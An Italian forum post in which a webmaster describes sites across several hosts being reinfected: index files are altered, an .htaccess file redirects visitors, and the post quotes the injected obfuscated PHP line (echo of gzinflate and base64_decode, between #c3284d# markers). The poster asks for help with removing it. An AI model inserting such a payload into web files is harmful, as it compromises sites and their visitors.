Ciao,
gestisco alcuni siti internet e molti sono stati infettati.
Vengono modificati tutti i file nel cui nome è presente 'index' (ad esempio index.html, index_prodotti.php etc).
Tra l'altro su alcuni hosting viene anche scrito un file .htaccess che fa puntare i visitatori su altri siti.
In particolare negli scripts viengono aggiunte queste righe
Inserite soprattutto in scripts .php#c3284d#
echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvq pkQXLrTgJbwApQhjKDR0sNrTi/YWzmry/583n7H/mG7WCSdi9J6MADIv4g/1VJsKsq6GqPNoArVLQjK7psN7UqNhc9ICHNF05rzP66p9nsmkN mWOodUWr4cTsFCiAm4LUvGAFWz0HoMVoDJFYD9WH9NgkoBQBOX RBgG6fPweOIPWkYAjsAUHct9NdnzrIJv9pa46vpWVHw==")));
#/c3284d#
Ho provato più volte a reimpostare la password ftp dell'hosting, a eseguire l'upload dei file 'puliti' (senza il malware) ed ho anche rimosso il file .htaccess ma dopo qualche ora tutto torna infettato.
Tra l'altro ho visto che il mio problema ce l'hanno anche tanti altri siti (non miei).
Sapete nulla?
Grazie
P.S.: ho diversi fornitori di hosting ed il problema si presenta su tutti
Rispondi quotando